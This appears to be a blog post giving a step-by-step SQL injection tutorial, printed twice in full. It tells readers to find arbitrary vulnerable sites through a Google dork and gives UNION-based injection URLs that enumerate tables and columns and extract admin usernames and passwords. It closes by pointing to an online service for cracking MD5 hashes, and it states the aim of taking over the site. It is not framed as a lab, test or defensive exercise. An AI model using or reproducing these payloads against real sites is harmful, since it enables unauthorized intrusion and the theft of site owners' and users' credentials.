Finding vunerability:
First of all we need a vunerable site as you all know
To find a vunerable site open google
Type in a dork like "inurl:index.php?id=" (without quotes)
Now click on any site like http://www.site.com/index.php?id=786
To test the vunerability of the site add a ' at the end of the site
If the site gives an error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'84' at line 1"
we can assume that it is vunerable.
Checking the number of columns:
To check the number of columns we do the following
http://www.site.com/index.php?id=-786 order by 1-- if the page loads normally without any error we proceed below
http://www.site.com/index.php?id=-786 order by 2-- (no error)
similarly check
http://www.site.com/index.php?id=-786 order by 3--
http://www.site.com/index.php?id=-786 order by 4--
http://www.site.com/index.php?id=-786 order by 5--
http://www.site.com/index.php?id=-786 order by 6-- =>error
if we get an error at the 6 like "unknown column" that means there exists only 5 columns.
Finding vunerable columns:
To find the vunerable columns we add union all select 1,2,3,4,5-- after http://www.site.com/index.php?id=-786
NOw the url becomes
http://www.site.com/index.php?id=-786 union all select 1,2,3,4,5--
after hitting enter we if we see some numbers like 2 4 some where on the page.Then the columns 2 and 3 are vunerable and data can be retrieved from colums 2 and 4
Finding Mysql version:
To find the sql version we replace 2 or 4 with @@version.
Now the url looks like
http://www.site.com/index.php?id=-786 union all select 1,@@version,3,4,5--
After hitting enter the sql version appears on the page
Lets assume we got 5.0.90-community-log on page which is sql version.
Getting Table names:
To get table names remove @@version from the url and replace it with table_name.
The url now becomes
http://www.site.com/index.php?id=-786 union all select 1,table_name,3,4,5 from information_schema.tables--
After hitting enter the page shows the tablenames.
Lets us assume we got something like this
comment,log,admin,news,news_comment,members.
To take over the site we data should be retrieved from admin table.
Getting the column names:
To get the column names from the table admin we do the following
http://www.site.com/index.php?id=-786 union all select 1,column_name,3,4,5 from information_schema.columns where table_name=char(ascii of tablename)--
Converting the tablename to ascii:
Convert the tablename to ascii here
http://www.getyourwebsitehere.com/jswb/t...ascii.html
The ascii generated for the table name admin is & #97;&# 100;&# 109;&# 105;&# 110;
Now remove &# and add a , between them
So now it is 97,100,109,105,110
Replace it in the place of ascii of the tablename
Now it is
http://www.site.com/index.php?id=-786 union all select 1,column_name,3,4,5 from information_schema.columns where table_name=char(97,100,109,105,110)--
You can now see something like
username pwd gender email on page
Getting username and password:
To get the username and password we use
http://www.site.com/index.php?id=-786 union all select 1,concat(username,0x3a,pwd),3,4,5 from admin-- and hit enter.
At this point we see username and password on page.
In some websites passwords are MD5 encrypted.Decrypt the passwords at http://www.md5decrypter.co.uk
First of all we need a vunerable site as you all know
To find a vunerable site open google
Type in a dork like "inurl:index.php?id=" (without quotes)
Now click on any site like http://www.site.com/index.php?id=786
To test the vunerability of the site add a ' at the end of the site
If the site gives an error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'84' at line 1"
we can assume that it is vunerable.
Checking the number of columns:
To check the number of columns we do the following
http://www.site.com/index.php?id=-786 order by 1-- if the page loads normally without any error we proceed below
http://www.site.com/index.php?id=-786 order by 2-- (no error)
similarly check
http://www.site.com/index.php?id=-786 order by 3--
http://www.site.com/index.php?id=-786 order by 4--
http://www.site.com/index.php?id=-786 order by 5--
http://www.site.com/index.php?id=-786 order by 6-- =>error
if we get an error at the 6 like "unknown column" that means there exists only 5 columns.
Finding vunerable columns:
To find the vunerable columns we add union all select 1,2,3,4,5-- after http://www.site.com/index.php?id=-786
NOw the url becomes
http://www.site.com/index.php?id=-786 union all select 1,2,3,4,5--
after hitting enter we if we see some numbers like 2 4 some where on the page.Then the columns 2 and 3 are vunerable and data can be retrieved from colums 2 and 4
Finding Mysql version:
To find the sql version we replace 2 or 4 with @@version.
Now the url looks like
http://www.site.com/index.php?id=-786 union all select 1,@@version,3,4,5--
After hitting enter the sql version appears on the page
Lets assume we got 5.0.90-community-log on page which is sql version.
Getting Table names:
To get table names remove @@version from the url and replace it with table_name.
The url now becomes
http://www.site.com/index.php?id=-786 union all select 1,table_name,3,4,5 from information_schema.tables--
After hitting enter the page shows the tablenames.
Lets us assume we got something like this
comment,log,admin,news,news_comment,members.
To take over the site we data should be retrieved from admin table.
Getting the column names:
To get the column names from the table admin we do the following
http://www.site.com/index.php?id=-786 union all select 1,column_name,3,4,5 from information_schema.columns where table_name=char(ascii of tablename)--
Converting the tablename to ascii:
Convert the tablename to ascii here
http://www.getyourwebsitehere.com/jswb/t...ascii.html
The ascii generated for the table name admin is & #97;&# 100;&# 109;&# 105;&# 110;
Now remove &# and add a , between them
So now it is 97,100,109,105,110
Replace it in the place of ascii of the tablename
Now it is
http://www.site.com/index.php?id=-786 union all select 1,column_name,3,4,5 from information_schema.columns where table_name=char(97,100,109,105,110)--
You can now see something like
username pwd gender email on page
Getting username and password:
To get the username and password we use
http://www.site.com/index.php?id=-786 union all select 1,concat(username,0x3a,pwd),3,4,5 from admin-- and hit enter.
At this point we see username and password on page.
In some websites passwords are MD5 encrypted.Decrypt the passwords at http://www.md5decrypter.co.uk
No comments:
Post a Comment